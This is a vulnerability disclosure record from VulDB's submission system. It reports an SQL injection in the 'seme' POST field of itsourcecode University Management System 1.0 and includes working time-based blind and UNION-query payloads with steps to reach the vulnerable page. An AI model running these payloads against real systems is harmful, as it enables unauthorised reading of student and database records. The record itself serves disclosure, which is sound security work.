| Title | itsourcecode University Management System 1.0 SQLi |
|---|
| Description | Register and log in with a student account, and in the student account's backend, visit "/view_single_result.php?vr=123321&vn=mirage," where "vr" refers to the StudentID and "vn" to the student's name. Click the "view Result" button. There is an SQL injection vulnerability in the "seme" field of the POST data packet sent.
POC:
Parameter: seme (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: seme=1st' AND (SELECT 4900 FROM (SELECT(SLEEP(5)))IWYu) AND 'sLik'='sLik
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: seme=1st' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b7a7171,0x424b4d66785475486669785141445a6a4e4f72774d675543446e585856446d686c56674b58685a57,0x7176767871),NULL-- - |
|---|
| Source | ⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE6-1.md |
|---|
| User | Dee.Mirage (UID 71702) |
|---|
| Submission | 07/18/2024 08:40 AM (11 months ago) |
|---|
| Moderation | 07/20/2024 04:14 PM (2 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 272074 [itsourcecode University Management System 1.0 view_single_result.php?vr=123321&vn=mirage seme sql injection] |
|---|
| Points | 20 |
|---|